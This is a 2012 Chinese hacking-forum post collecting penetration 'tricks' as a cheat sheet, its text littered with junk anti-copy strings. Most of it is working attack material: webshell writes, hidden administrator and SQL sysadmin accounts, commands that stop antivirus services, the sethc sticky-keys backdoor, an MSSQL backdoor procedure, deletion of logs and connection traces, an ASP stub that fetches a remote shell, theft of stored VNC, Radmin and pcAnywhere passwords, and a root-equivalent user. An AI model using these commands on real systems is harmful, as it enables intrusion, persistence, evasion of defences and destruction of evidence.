中国网络渗透测试联盟

标题: 渗透技巧总结 [打印本页]

---

作者: admin    时间: 2012-9-5 15:00
标题: 渗透技巧总结
旁站路径问题
1、读网站配置。
2、用以下VBS
On Error Resume Next
If (LCase(Right(WScript.Fullname,11))="wscript.exe") Then
        

Msgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "

Usage:Cscript vWeb.vbs",4096,"Lilo"
        WScript.Quit
% O) v9 u" H1 u: R; D; J, \0 A/ JEnd If
Set ObjService=GetObject
, e0 |2 l: b( _( O* m- @6 \. f3 P, L
("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
        If IsNumeric(obj3w.Name)

8 |( W; B% F4 `- E, V, D2 \Then
                Set OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
: n1 H" @- q( b7 L         
; l2 g0 k4 G7 v0 d! E" P
       Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
                If Err
9 ~  W2 o* Q$ u7 n9 t: Z
<> 0 Then WScript.Quit (1)
                WScript.Echo Chr(10) & "[" &
0 A9 M# P6 c1 S
OService.ServerComment & "]"
1 W, J" @6 [  T+ [* x                For Each Binds In OService.ServerBindings
     

                   Web = "{ " & Replace(Binds,":"," } { ") & " }"
                        
- L4 f% ^8 y; f8 J7 I
; t+ h/ B" F1 x& ^WScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","")
7 l6 l% J+ S7 Y9 [: o                Next
9 e% w# p& A4 q      
/ o7 B' T6 i1 H* b1 Y" W( C
; p6 Y# x7 |! H3 V8 L1 a+ F         WScript.Echo "ath            : " & VDirObj.Path
        End If
! \8 ]# j- R1 _" U. p2 v8 L2 A# c' P) {Next
复制代码
3、iis_spy列举（注：需要支持ASPX，反IISSPY的方法：将activeds.dll，activeds.tlb降权）
4、得到目标站目录，不能直接跨的。通过echo  ^<%execute(request("cmd"))%^> >>X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp  像目标目录写入webshell。或者还可以试试type命令.
—————————————————————
& K: D. a; r# v2 g5 iWordPress的平台，爆绝对路径的方法是：
) [) G; g# q$ ?! z5 |url/wp-content/plugins/akismet/akismet.php
url/wp-content/plugins/akismet/hello.php
9 V& {  S+ v$ A* l& E——————————————————————
phpMyAdmin暴路径办法:
phpMyAdmin/libraries/select_lang.lib.php
phpMyAdmin/darkblue_orange/layout.inc.php
' f! c1 Q6 `2 m& sphpMyAdmin/index.php?lang[]=1
, C; ^2 k7 V3 x4 Mphpmyadmin/themes/darkblue_orange/layout.inc.php
4 F" k- l2 B- l; q# B0 Z$ W————————————————————
网站可能目录(注：一般是虚拟主机类）
data/htdocs.网站/网站/
1 M3 y, ~/ ]9 A" e7 i7 z5 b————————————————————
CMD下操作VPN相关
" o0 L) I' ?, ]& B. h9 @* X+ vnetsh ras set user administrator permit #允许administrator拨入该VPN
netsh ras set user administrator deny #禁止administrator拨入该VPN
netsh ras show user #查看哪些用户可以拨入VPN
netsh ras ip show config #查看VPN分配IP的方式
; ~4 a' j4 [- _: O  Qnetsh ras ip set addrassign method = pool #使用地址池的方式分配IP
) O1 L2 H$ W$ ~9 K2 t# Vnetsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254
5 p/ G; i9 U+ d6 i7 h8 r( x, {————————————————————
  J2 C* B; s# t8 V" \命令行下添加SQL用户的方法
$ r7 l$ ~8 ^7 \& {6 b需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:
- Y- W- {/ b+ \) @exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember 'test, 'sysadmin'
. e2 o* X2 [( I( o然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry
4 x5 {7 s$ s0 \8 l6 I& n
另类的加用户方法
在删掉了net.exe和不用adsi之外，新的加用户的方法。代码如下：
$ Z$ [2 Q2 n# s* s# |! sjs:
) C7 g0 a; E% o3 g& d! [! L9 Y, l/ {var o=new ActiveXObject( "Shell.Users" );
$ n8 G- f) O& d+ A) `# n/ I2 pz=o.create("test") ;
z.changePassword("123456","")
7 C' }9 E' E9 m. _$ `3 Jz.setting("AccountType")=3;

6 g! _2 n" n. t9 A3 e$ |. Uvbs:
5 G* _1 v5 E: v; m0 T/ v1 \* wSet   o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
" h6 i  a, t4 H+ I: V3 wz.setting("AccountType")=3
  T2 H! g" b0 q; P——————————————————
cmd访问控制权限控制（注：反everyone不可读，工具-文件夹选项-使用简单的共享去掉即可）
+ ^' x, S% t" S! e* h
% r& T, U, I7 f命令如下
cacls c: /e /t /g everyone:F           #c盘everyone权限
cacls "目录" /d everyone               #everyone不可读，包括admin
————————以下配合PR更好————
3389相关
a、防火墙TCP/IP筛选.（关闭net stop policyagent & net stop sharedaccess）
b、内网环境（LCX）
c、终端服务器超出了最大允许连接
XP 运行mstsc /admin
* j  E/ {. ?! k$ W2003 运行mstsc /console   
/ M- \7 y) z2 M3 S
杀软关闭（把杀软所在的文件的所有权限去掉）
' b' w! t) D- n9 k  b处理变态诺顿企业版：
& g- t) c) _% z8 d3 R$ jnet stop "Symantec AntiVirus" /y
; o0 a/ ?7 ~6 \1 m* Z, g" Y: }net stop "Symantec AntiVirus Definition Watcher" /y
; s: S, W2 R( h. i) r. anet stop "Symantec Event Manager" /y
3 g7 c. s- h6 m0 ^/ a0 Bnet stop "System Event Notification" /y
net stop "Symantec Settings Manager" /y
! E: M+ u  ^0 P: y
% M# m2 a8 w2 c' L1 B  B) l) ~# m卖咖啡：net stop "McAfee McShield"
1 W# S1 U! W1 h+ ?————————————————————
  ^( E8 S8 h; c! \
8 m$ l- V' g- ]0 J5次SHIFT：
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
- X5 C% {7 O/ K0 B% ocopy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
( v* i4 k3 Q; c+ o5 Y——————————————————————
9 H. S' _( H/ L1 @" Z( P- g& i隐藏账号添加：
) B- p$ V, I! a, G) j1、net user admin$ 123456 /add&net localgroup administrators admin$ /add
/ }  F9 T  b  v5 x2 {, t8 d! ]2、导出注册表SAM下用户的两个键值
3、在用户管理界面里的admin$删除，然后把备份的注册表导回去。
4、利用Hacker Defender把相关用户注册表隐藏
) e' H) D" l/ U" q4 T& [( j——————————————————————
MSSQL扩展后门：
) a; E% j2 U# N) H9 ZUSE master;
EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
GRANT exec On xp_helpsystem TO public;
———————————————————————
日志处理
) g% c; f6 Y4 h$ B& f( cC:\WINNT\system32\LogFiles\MSFTPSVC1>下有
$ Y: @2 @" K& c; q1 O" J. u: ^% Iex011120.log / ex011121.log / ex011124.log三个文件，
直接删除 ex0111124.log
0 i1 H+ _+ F6 T  C" d! I不成功，“原文件...正在使用”
当然可以直接删除ex011120.log / ex011121.log
用记事本打开ex0111124.log，删除里面的一些内容后，保存，覆盖退出，成功。
, Y' F8 N- H* K, j当停止msftpsvc服务后可直接删除ex011124.log
& [( O$ r1 H% w/ [# c
! A  V, L/ h' a6 M: P- sMSSQL查询分析器连接记录清除：
MSSQL 2000位于注册表如下：
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
找到接接过的信息删除。
MSSQL 2005是在C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL

. ]. u% K7 U. h! W$ QServer\90\Tools\Shell\mru.dat
, M/ ~/ q  j9 D—————————————————————————
防BT系统拦截可使用远程下载shell，也达到了隐藏自身的效果，也可以做为超隐蔽的后门，神马的免杀webshell，用服务器安全工具一扫通通挂掉了）
4 G- z" s! Z4 Z; C" P+ y
<%
2 Q" m. D# f6 ISub eWebEditor_SaveRemoteFile(s_LocalFileName,s_RemoteFileUrl)
Dim Ads, Retrieval, GetRemoteData
On Error Resume Next
* |, D6 j& ~" X+ o/ U: y  G6 PSet Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
* \: S6 j; a7 XWith Retrieval
.Open "Get", s_RemoteFileUrl, False, "", ""
.Send
- c+ `1 E6 V4 B* h3 a, o9 q# ZGetRemoteData = .ResponseBody
End With
" q7 ]' m" ^8 N2 tSet Retrieval = Nothing
Set Ads = Server.CreateObject("Adodb.Stream")
0 O6 k/ ^) c* D! UWith Ads
5 b8 g, k2 I# U7 V+ N& z.Type = 1
.Open
.Write GetRemoteData
.SaveToFile Server.MapPath(s_LocalFileName), 2
.Cancel()
% ^+ r2 u2 [* f* H' [4 k.Close()
End With
+ O  C' X+ Q# ^" t) D9 ZSet Ads=nothing
0 ]2 v7 i/ k3 [8 Y6 H8 O0 O; ^End Sub

eWebEditor_SaveRemoteFile"your shell's name","your shell'urL"
$ ^3 n2 C8 l+ ?7 X3 p%>

VNC提权方法:
利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解
注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
regedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\SOFTWARE\ORL"
6 H8 c' R* L% g0 {' ^- N2 e  X- oregedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4"
! `9 }, v7 Z( B: ARadmin 默认端口是4899，
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
2 k2 h: Q& \* h, r6 JHKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
然后用HASH版连接。
如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWHERE从本机登陆服务器。
5 ]; h2 i9 Y( P/ H保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下，那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All
Users\Application Data\Symantec\pcAnywhere\文件夹下。
——————————————————————
搜狗输入法的PinyinUp.exe是可读可写的直接替换即可
——————————————————----------
WinWebMail目录下的web必须设置everyone权限可读可写，在开始程序里，找到WinWebMail快捷方式下下
& o' _/ a- g8 g% d; ~2 U来，看路径，访问 路径\web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。
没有删cmd组建的直接加用户。
7i24的web目录也是可写，权限为administrator。
9 K1 E' N* \7 h8 `8 |
1433 SA点构建注入点。
<%
strSQLServerName = "服务器ip"
* f2 Z3 R9 ~" j) A% D$ t3 JstrSQLDBUserName = "数据库帐号"
9 B! f4 B" @! g# AstrSQLDBPassword = "数据库密码"
. r& u6 ]+ f1 S# b' ~2 jstrSQLDBName = "数据库名称"
- V" a6 _& O5 f9 HSet conn = Server.createObject("ADODB.Connection")
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName &

8 V/ g8 C5 W8 `% f$ M  q3 `5 h- U";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" &

strSQLDBName & ";"
( r2 I1 n4 g4 ]6 f' kconn.open strCon
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
4 u% q& k* y5 A9 \( {' zid = request("id")
' ]& z4 b7 J! \strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
2 T* Q; V& ?! T% q! d) Q6 d  U7 }% @rs.close
%>
复制代码
******liunx 相关******
一.ldap渗透技巧
1.cat /etc/nsswitch
& K: |' y# ~; b: U' ]$ `看看密码登录策略我们可以看到使用了file ldap模式
  N' ?( J( p' h0 r. g7 g/ a+ ]# R, h
2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
* ~  d' Q! ^/ Z% h! l找到ou,dc,dc设置
4 F/ n9 ^1 e. A% S; S7 y% @
5 _/ ]* p- U+ B% s/ f2 e3.查找管理员信息
匿名方式
) u/ z& L0 N& M# q6 _1 Mldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
8 r2 H- U' ^/ D! i2 h/ U6 q' A1 @
; F+ {. C) s* l8 q0 {"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b

"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
* `9 Q: U" L8 g0 t9 W
+ I! b* ?3 ^: R5 E! ]! ?
4.查找10条用户记录
& y6 r" R. s* Q" d7 ], N- hldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
4 g% {3 N; O4 d2 Z, m! a5 L
实战:
1.cat /etc/nsswitch
9 v' L# S8 S2 Y1 n% p7 ]( u' k# ]$ {看看密码登录策略我们可以看到使用了file ldap模式

- d/ G  }: l7 l% R2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置

* f( ]# A) ]1 i5 F4 z3.查找管理员信息
匿名方式
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
! y( y8 e$ y1 h0 v* V8 }
. \; Z8 ^8 }! v2 t- ?) {# M"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
& x, O2 G# k5 V, T1 r; F有密码形式
. e9 Q& U! S' Mldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
! H* o* x% l$ p  u4 [- E: e4 v4 e
5 @3 K$ C4 ?( s" ?"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
% L- n+ _  W2 p% h0 S0 R
2 {$ m, \0 H7 c) _( C8 A! x
5 v% d0 }5 T, ?' _0 V+ P4.查找10条用户记录
/ ^! X& A1 F2 Q! C  hldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
: C' ^3 }! [$ E' Y: _/ X
渗透实战:
) M! y, b7 \5 ?9 y1.返回所有的属性
ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
, J3 J3 W7 y" Eversion: 1
0 M3 x* j; q; t. jdn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
" n- p$ g. i: J1 z* vobjectClass: top
1 ~. f) X- H4 d3 Wsn: manager
, N, ~( e/ r' m! Y$ t5 C8 _cn: manager
0 i5 d& }# y6 D! `8 o
% I' w6 J2 t- V6 ], Tdn: uid=superadmin,dc=ruc,dc=edu,dc=cn
! {5 K  X, z5 w: F, Uuid: superadmin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: superadmin
cn: superadmin

+ k' @0 q" t- {* \) M1 c  \dn: uid=admin,dc=ruc,dc=edu,dc=cn
5 |1 G1 C( N5 Xuid: admin
objectClass: inetOrgPerson
objectClass: organizationalPerson
7 T8 w  C3 D: w1 {( B* Z9 J; [objectClass: person
objectClass: top
sn: admin
cn: admin
  d8 @2 s9 Y8 F  q* t! A" o
1 p: o8 {' s2 N! K, Ldn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
; e: t" E* R7 B; j8 j- f6 c+ kuid: dcp_anonymous
objectClass: top
objectClass: person
/ N' C4 u! s- }! B1 N' d" DobjectClass: organizationalPerson
# ^7 ], \* g6 jobjectClass: inetOrgPerson
. |' f7 ~% x  V" C# J9 I3 Esn: dcp_anonymous
' q0 R' p; n/ q; B+ `: R# ^8 Ccn: dcp_anonymous

2.查看基类
bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" |
% B7 J) `& N* X/ j! }
! U9 Z; i& I' W8 @/ }9 _more
6 V) Y2 [4 Z( B3 j: I8 ?# o( \version: 1
dn: dc=ruc,dc=edu,dc=cn
  k  u3 }5 A  wdc: ruc
# n, S2 t' V2 |3 I6 T/ GobjectClass: domain

3.查找
1 J" Y" }( S( y* ]9 g) K" h, xbash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
version: 1
; t7 T" f. z" Q( o; _dn:
7 a% S% h# d. R4 k$ i+ c' p( nobjectClass: top
, S5 w7 N9 T; P' L  ]5 O3 SnamingContexts: dc=ruc,dc=edu,dc=cn
supportedExtension: 2.16.840.1.113730.3.5.7
supportedExtension: 2.16.840.1.113730.3.5.8
: j8 E+ X0 M" O/ U2 e6 r6 r* g4 XsupportedExtension: 1.3.6.1.4.1.4203.1.11.1
7 ?1 W* _/ c8 nsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
* U! C! C$ f. v' @0 n+ HsupportedExtension: 2.16.840.1.113730.3.5.3
supportedExtension: 2.16.840.1.113730.3.5.5
; r% p- L5 |( `& P5 J* F8 vsupportedExtension: 2.16.840.1.113730.3.5.6
% X) F. I# X3 `7 K& ]supportedExtension: 2.16.840.1.113730.3.5.4
+ j% y0 Y6 ?' |8 C* HsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
. B: h. _% W& u; o# n/ wsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
* y+ m/ l* L2 V! [5 hsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
  h, K, p3 S1 }- n. t% {6 lsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
9 w+ f0 B9 r- JsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
6 g9 n6 R: p  T0 i3 t! k# bsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
9 S  f1 t# V4 u! @9 Z( H2 nsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
/ b7 y- a9 E8 J/ PsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
supportedExtension: 1.3.6.1.4.1.1466.20037
supportedExtension: 1.3.6.1.4.1.4203.1.11.3
supportedControl: 2.16.840.1.113730.3.4.2
/ p1 Q5 [7 x) |) k  q9 KsupportedControl: 2.16.840.1.113730.3.4.3
8 _: O+ s  F1 o$ CsupportedControl: 2.16.840.1.113730.3.4.4
# l! t2 ]: j/ ^supportedControl: 2.16.840.1.113730.3.4.5
8 s/ ?0 L1 U0 r. V0 F9 S6 ?supportedControl: 1.2.840.113556.1.4.473
supportedControl: 2.16.840.1.113730.3.4.9
! ^; W7 `* v- c8 }6 I) hsupportedControl: 2.16.840.1.113730.3.4.16
supportedControl: 2.16.840.1.113730.3.4.15
8 n9 X$ D# G$ h' [supportedControl: 2.16.840.1.113730.3.4.17
2 V  J6 t2 K* KsupportedControl: 2.16.840.1.113730.3.4.19
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
! D7 @; [7 r) F2 IsupportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
; L0 S5 Z& L8 f& y/ H$ ?# W" CsupportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 2.16.840.1.113730.3.4.14
supportedControl: 1.3.6.1.4.1.1466.29539.12
, ]# H8 l1 t6 T3 X6 wsupportedControl: 2.16.840.1.113730.3.4.12
1 t& ~* G$ j$ M; {supportedControl: 2.16.840.1.113730.3.4.18
# N$ i) r0 b$ x4 s1 U" b0 X. TsupportedControl: 2.16.840.1.113730.3.4.13
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
/ }+ n) w+ A( k$ ?% Q2 wsupportedLDAPVersion: 3
( N! L8 o) q. I8 qvendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
dataversion: 020090516011411
6 E: e* b" O4 D+ d" w" gnetscapemdsuffix: cn=ldap://dc=webA:389
* ^/ ?; D9 Z+ I3 P" f% ksupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
, f$ z1 B  l0 v: G3 F) \, z( }supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
/ W$ _; i9 D, _  u- E! \8 esupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
# ?3 A( |6 R8 L( AsupportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
9 X/ v) c0 r  v; q% osupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
( C3 Q8 b2 j! ~1 ~4 O' [9 Y4 OsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
2 M5 J# F9 D, k+ Z) O# ZsupportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
: |, ^* t4 h9 CsupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
' ~) O! {7 T* q4 s1 @. dsupportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
% w# r5 x! ~8 {: ]" z) J  BsupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
% Z$ z+ a% v/ }supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
5 k# x. i& x; c, J* `8 S4 UsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
( ^9 o1 e) I& O+ t" \  gsupportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
2 `& u) X# C3 h" p" M9 c( M! ?' X  MsupportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
5 I2 w( g% V7 W( WsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
- L" u' B9 U5 R- [6 v0 IsupportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
  g# U0 G- Q/ W9 p3 dsupportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
: V+ N, T9 |' p/ AsupportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
! q2 ^* C+ T1 o# d3 L6 v  M7 fsupportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
/ w6 O" v1 B+ bsupportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
; c4 x- |. t% _, v' psupportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
" l5 Q# ^1 c  ?3 s3 qsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
$ U. j8 n2 U* H& k8 L: ~supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
) b# J5 [4 _2 }supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
( X) ?* x. {3 X4 v) D9 D" {1 RsupportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
) Y* k0 `# Z2 s8 O) }. HsupportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
2 `4 E3 Z9 M. H' x/ N/ }0 \supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
7 \; w% x4 ~5 L, ?7 J8 ssupportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
% ?' _5 W& x0 Y! X/ }' ]" esupportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
" T- f( @9 I1 w( u2 C3 j( }6 a7 i  KsupportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
————————————
5 F2 M' F5 R4 l6 b: A, F2. NFS渗透技巧
showmount -e ip
7 L# H1 w5 H9 v列举IP
——————
9 y! d8 Q+ S+ o4 r* y* ?/ c3.rsync渗透技巧
1.查看rsync服务器上的列表
! ^! [) [$ r! O+ ~% Vrsync 210.51.X.X::
" u% I# H7 ~! j! vfinance
8 V4 t% ^6 a: n& P& k* nimg_finance
auto
  }; i" H8 C- G9 m2 m2 J( Dimg_auto
html_cms
/ x3 W% W: U" `+ H: [img_cms
ent_cms
ent_img
, N3 P, U, w% Dceshi
/ H" g% o( r7 Qres_img
4 x* u+ {0 R+ o4 M3 Wres_img_c2
/ e/ U7 h3 m% M  u" k& ?  D% nchip
chip_c2
ent_icms
games
: D0 @& T1 g% I7 x8 Z0 igamesimg
media
mediaimg
fashion
res-fashion
. `4 n2 y) U) G' U- t/ i% Rres-fo
0 W. p; u/ x4 P- d3 utaobao-home
res-taobao-home
4 A  U7 q. f1 uhouse
res-house
res-home
8 H8 j: M0 \( K( h. Z  y- Q0 k% z& Nres-edu
res-ent
res-labs
4 H  W' |) l% L& Tres-news
res-phtv
3 y7 A& w; ]! C. |3 Xres-media
: k0 P3 y  L: R! I1 g* dhome
+ p2 E# V; G. Xedu
news
7 j' {7 m2 X( s2 lres-book

& c- P* ^3 C* s9 |2 a# e0 O, J看相应的下级目录(注意一定要在目录后面添加上/)
! n0 C& Q5 r- f3 ]1 d6 W- \* s& q

rsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
rsync 210.51.X.X::edu/
: E6 ^5 t, o! U; P
2.下载rsync服务器上的配置文件
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
2 |4 P4 N: d( z& Z# n. u! E
3.向上更新rsync文件(成功上传,不会覆盖)
# b9 o. @; [! i# I4 t4 V4 b$ u  irsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
http://app.finance.xxx.com/warn/nothack.txt

四.squid渗透技巧
nc -vv baidu.com 80
GET HTTP://www.sina.com / HTTP/1.0
GET HTTP://WWW.sina.com:22 / HTTP/1.0
  B; f* L' [9 S# b. K五.SSH端口转发
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

$ ^2 q9 y+ s/ z& ]! U( f六.joomla渗透小技巧
) x# G" k) X3 ]5 V3 t0 _! d确定版本
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-

15&catid=32:languages&Itemid=47
/ O( Z6 R+ \6 H5 q8 T
重新设置密码
index.php?option=com_user&view=reset&layout=confirm
" a" d" e/ r; w9 `3 y4 f
9 n1 m7 n) ~- O; a6 ?; V) t七: Linux添加UID为0的root用户
1 n4 R# g. ^( Y1 }) iuseradd -o -u 0 nothack

+ Q. V$ x8 j" t& y八.freebsd本地提权
[argp@julius ~]$ uname -rsi
" i* p# n' ?/ b/ Q* freebsd 7.3-RELEASE GENERIC
, v" U8 _; v( q( k+ w* [argp@julius ~]$ sysctl vfs.usermount
* vfs.usermount: 1
* [argp@julius ~]$ id
. j# \6 b! s. j3 ~6 t- [& @* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
% e; \' a( O3 V" o/ y: g* O* [argp@julius ~]$ ./nfs_mount_ex
*
calling nmount()
& q0 k3 E  N; @8 X. B% x% q% @
（注：本文原件由0x童鞋收集整理，感谢0x童鞋，本人补充和优化了点，本文毫无逻辑可言，因为是想到什么就写了，大家见谅）
* o" P- |5 A0 J2 a* ~4 P- L1 h6 j; B——————————————
